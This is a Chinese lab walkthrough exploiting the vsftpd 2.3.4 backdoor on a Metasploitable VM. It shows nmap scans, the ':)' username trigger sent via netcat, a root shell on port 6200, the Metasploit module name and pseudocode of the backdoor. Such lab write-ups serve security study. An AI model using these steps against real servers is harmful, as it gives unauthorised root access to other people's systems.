笑脸漏洞

news/2025/3/20 10:54:11/文章来源:https://www.cnblogs.com/liufengwuya/p/18502298

目前网络:mp和kali都是NAT模式,连的是手机热点

在ifconfig得知本机ip为192.168.75.133,用nmap扫描网段

nmap 192.168.75.0/24
nmap 网关ip/24

┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.75.0/24                                                                                
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-25 11:09 CST
Nmap scan report for 192.168.75.1
Host is up (0.00036s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2869/tcp open  icslap
6881/tcp open  bittorrent-tracker
MAC Address: 00:50:56:C0:00:08 (VMware)Nmap scan report for 192.168.75.2
Host is up (0.00022s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:EE:63:B9 (VMware)Nmap scan report for 192.168.75.132
Host is up (0.0019s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:8F:5D:C1 (VMware)Nmap scan report for 192.168.75.254
Host is up (0.0011s latency).
All 1000 scanned ports on 192.168.75.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:FA:97:6D (VMware)Nmap scan report for 192.168.75.133
Host is up (0.0000040s latency).
All 1000 scanned ports on 192.168.75.133 are in ignored states.
Not shown: 1000 closed tcp ports (reset)Nmap done: 256 IP addresses (5 hosts up) scanned in 8.10 seconds

可以看出来mp的ip应该是192.168.75.132

看下每个端口的服务是什么

nmap -sV 靶机ip

┌──(root㉿kali)-[/home/kali]
└─# nmap -sV 192.168.75.132                                                                             
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-25 11:12 CST
Nmap scan report for 192.168.75.132
Host is up (0.0025s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:8F:5D:C1 (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.45 seconds     

利用netcat与21端口建立连接
nc 靶机ip 目标端口

┌──(root㉿kali)-[/home/kali]
└─# nc 192.168.75.132 21220 (vsFTPd 2.3.4)

220状态码表示服务已准备好

接下里输入(用户名字里得带英文键的:)用作结尾,这里以a:)为例)
use a:)
提示331码(表示需要密码)后
然后输入(随便输入,这里以123为例)
pass 123
在显示421 Timeout前

打开另一个命令行
用nmap扫描靶机的6200端口

nmap -p 目标端口 靶机ip

┌──(root㉿kali)-[/home/kali]
└─# nmap -p 6200 192.168.75.132        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-25 11:34 CST
Nmap scan report for 192.168.75.132
Host is up (0.00048s latency).PORT     STATE SERVICE
6200/tcp open  lm-x
MAC Address: 00:0C:29:8F:5D:C1 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds 

可以看到是开着的

现在用netcat连下6200端口
nc 靶机ip 目标端口

┌──(root㉿kali)-[/home/kali]
└─# nc 192.168.75.132 6200     
whoami
root
^C

连接后输入whoami
显示root
说明此时有了管理员权限了

在mp上查看该漏洞

输入msfconsole打开mp
输入search vsftpd 2.3.4
pAwthmd.png
输入
use exploit/unix/ftp/vsftpd_234_backdoor
info
pAwt5TI.png
pAwtTtP.png

脚本:

/* vsftpd login handling pseudocode demonstration */int handle_user_login(const char* username) {char user_buf[512];strncpy(user_buf, username, sizeof(user_buf) - 1);user_buf[sizeof(user_buf) - 1] = '\0';/* 检查用户名中是否包含:) */if (strlen(user_buf) > 6) {char* ptr = strstr(user_buf, ":)");if (ptr != NULL) {/* 触发后门逻辑 */if (fork() == 0) {/* 子进程 */int sockfd = create_socket();bind_port(sockfd, 6200);listen_and_handle(sockfd);exit(0);}return -1;  // 返回登录失败}}return validate_normal_login(user_buf);
}void process_login_request(int client_fd) {char username[512];receive_username(client_fd, username);int login_result = handle_user_login(username);if (login_result < 0) {send_login_failed(client_fd);}
}
  • 在用户名中包含:)字符串
  • 会触发一个特殊的代码路径
  • 会在端口6200上打开一个后门监听
  • 这个后门会以root权限运行
  • 允许未经授权的命令执行

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/821657.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

编写汇编代码最好的IDE是什么

最好的IDE取决于你的使用场景和个人偏好,但值得推荐的有:1. Visual Studio;2. NASM;3. MASM;4. RadASM;5. IDA Pro。其中,对于需要高级调试工具和库资源的开发者而言,Visual Studio可能是最佳选择;而对于初学者和教育用途,NASM则提供了一个简单的学习平台。1. Visual…

【CodeForces训练记录VP】Codeforces Round 933 (Div. 3)

https://codeforces.com/contest/1941 训练情况 50min后罚坐反思 C题刚开始思路错了,以为是删字符串最后面,然后漏考虑掉两字符串部分拼接的情况 A题 直接模拟,求 \(a_i + b_j \le k\) 的对数。 #include <bits/stdc++.h> #define int long longusing namespace std;v…

AWS和Azure在云服务提供商中有什么区别

AWS和Azure在云服务提供商中的区别:1.申请主体差异;2.服务推送频率不同;3.消息提醒机制;4.支付功能异同;5.客服服务对比;6.自定义菜单差异;7.收费细则异同。AWS(亚马逊云服务)和Azure(微软云)是两大主流云服务提供商,它们在云计算领域有着显著的区别。1.申请主体差…

中电金信:守护金融安全内控合规与反电信诈骗

​ 在金融科技迅猛发展的今天,金融机构在享受数字化带来的便捷的同时,也面临着日益严峻的内控合规挑战和电信诈骗威胁。监管政策的日益严格和电信诈骗手段的不断翻新,对金融机构的风控能力提出了更高的要求。2023年以来,国家金融监督管理总局、央行和外汇管理局共开出罚单3…

如何理解SaaS公司的净收入留存

SaaS公司的净收入留存(Net Revenue Retention, NRR)是一项关键指标,用于衡量公司从现有客户中获取的收入的增长或减少。主要包括以下方面:1、客户保留,了解客户流失对收入的影响;2、现有客户增值,观察现有客户购买更多服务的情况;3、收入减少的分析,研究由于客户降级或…

PHP7卓越性能背后的原理有哪些

### PHP7卓越性能背后的原理有哪些 在谈论PHP7卓越性能背后的原理时,我们可以归纳为几个核心要点:改进的Zend引擎、内存使用优化、JIT编译引入、数据结构优化。这些改进共同作用,使PHP7相比于PHP5.6在性能上实现了巨大飞跃,具体体现在运行速度提升约两倍,以及更低的内存消…

『玩转Streamlit』--多页应用

Streamlit不仅让创建单页应用变得易如反掌,更通过一系列创新特性,支持构建多页面应用,极大地丰富了用户体验和数据探索的可能性。 随着我们Streamlit App的功能逐渐增多之后,单个页面展示过多信息,使用不便, 通过多页面可以将功能相关的部分组织在一起,形成逻辑清晰的多…

触觉智能赴南方科技大学进行Purple Pi OH开源鸿蒙开发板培训圆满完成!

2024年10月19日,触觉智能科技有限公司在南方科技大学成功举办了一场别开生面的OpenHarmony开发板培训活动。校企联合教学,促进了教育与产业的紧密结合,通过引入企业的实际案例和经验,使教学内容更加贴近实际需求。作为开源鸿蒙硬件方案领跑者,深圳触觉智能将不遗余力、持续…

直播系统使用什么语言编写的

编写直播系统主要会用到以下四种语言:一、Java;二、Python;三、C++;四、Golang。Java作为一种功能强大且稳定的编程语言,在直播系统的开发中占据着重要地位,它通常用于处理后端逻辑、数据存储、业务逻辑的实现、视频编解码等关键部分。一、Java Java作为一种广泛应用于软…

案例分析——HyperWorks练习做模型简化

Step 01:载入模型 Exercise_2b.hm。图 2-20 Exercise_2b 模型alt="Exercise_2b 模型"Step 02:去除曲边导角。 (1) 进入 defeature 面板。 (2) 进入 edge fillets 子面板。 (3) 选择图形区所有显示曲面。 (4) 在 min radius 栏输入 1。 (5) 在 max radius 栏输入 20…

团队作业2-《需求规格说明书》

这个作业属于哪个课程 广工计院计科34班软工这个作业要求在哪里 作业要求这个作业的目标 小飞棍团队开会确定最终选题并通过需求分析制定需求规格说明书,建立和初步熟悉团队git协助方式一、团队简介队名:小飞棍队团队成员:罗振烘(组长) 3122004748庄崇立 3122004633李响 3…

用于数据挖掘的分类算法有哪些

数据挖掘的分类算法是一类用于识别和预测类别的算法,主要包括:1. 决策树,如C4.5和CART,适用于可解释性强的场景;2. SVM(支持向量机),适合线性和非线性分类问题;3. 随机森林,集成多个决策树以提高准确性;4. K-近邻算法,基于相似性进行分类。其中,随机森林以其出色的…